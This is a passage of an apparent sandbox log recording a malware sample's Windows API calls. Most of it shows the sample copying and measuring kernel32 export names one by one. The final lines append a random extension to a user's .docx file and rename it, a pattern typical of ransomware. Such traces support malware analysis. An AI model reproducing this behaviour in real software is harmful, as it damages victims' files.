lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.409] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.409] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.409] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.409] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.409] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.409] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.409] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.409] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.409] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.410] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.410] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.410] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.410] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.410] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.410] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.410] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.410] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.410] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.410] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.410] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.410] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.410] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.410] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.410] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.410] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.410] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.410] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.410] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.411] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.411] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.411] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.411] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.411] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.411] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.411] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.411] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.411] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.411] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.411] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.411] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.411] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.411] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.411] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.411] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.411] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.411] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.412] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.412] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.412] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.412] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.412] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.412] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.412] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.412] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.412] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.412] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.412] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.412] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.412] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.412] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.412] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.412] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.412] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.412] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.412] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.413] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.413] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.413] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.413] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.413] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.413] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.413] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.413] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.413] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.413] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.413] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.413] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.413] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.413] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.413] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.413] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.413] lstrlenA (lpString="DELETEATOM") returned 10 [0084.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.413] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.413] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.414] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.414] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.414] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.414] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.414] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.414] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.414] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.414] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.414] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.414] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.414] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.414] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.414] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.414] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.414] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.414] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.414] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.414] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.415] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.415] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.415] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.415] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.415] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.415] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.415] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.415] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.415] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.415] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.415] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.415] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.415] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.415] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.415] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.415] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.415] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.415] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.415] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.415] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.416] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.416] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.416] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.416] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\a05Mw73tf.docx") returned 71 [0084.416] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\a05Mw73tf.docx.kPbHL74") returned 79 [0084.416] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\a05Mw73tf.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\a05mw73tf.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS 